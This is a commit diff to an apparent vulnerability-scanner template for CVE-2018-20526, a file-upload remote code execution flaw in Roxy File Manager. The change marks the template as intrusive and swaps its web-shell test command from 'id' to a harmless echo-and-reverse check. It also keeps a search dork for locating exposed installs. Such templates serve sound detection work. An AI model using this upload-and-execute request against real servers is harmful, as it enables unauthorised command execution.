Update CVE-2018-20526.yaml

2022-08-23 11:44:19 +05:30 · 2022-08-23 11:44:19 +05:30 · 3addefe08e
parent fd7ac2aeb6
commit 3addefe08e
1 changed files with 3 additions and 5 deletions
--- a/cves/2018/CVE-2018-20526.yaml
+++ b/cves/2018/CVE-2018-20526.yaml
@ -14,7 +14,7 @@ info:
  metadata:
    verified: "true"
    google-dork: intitle:"Roxy file manager"
-  tags: cve,cve2018,roxy,fileman,rce,fileupload
+  tags: cve,cve2018,roxy,fileman,rce,upload,intrusive

 requests:
  - raw:
@ -52,7 +52,7 @@ requests:
        ------WebKitFormBoundary20kgW2hEKYaeF5iP--

      - |
-        GET /Uploads/{{randstr}}.php7?cmd=id HTTP/1.1
+        GET /Uploads/{{randstr}}.php7?cmd=echo+"roxyfileman"+|+rev HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
@ -63,9 +63,7 @@ requests:
      - type: word
        part: body
        words:
-          - "uid="
-          - "gid="
-          - "groups="
+          - "namelifyxor"

      - type: word
        part: header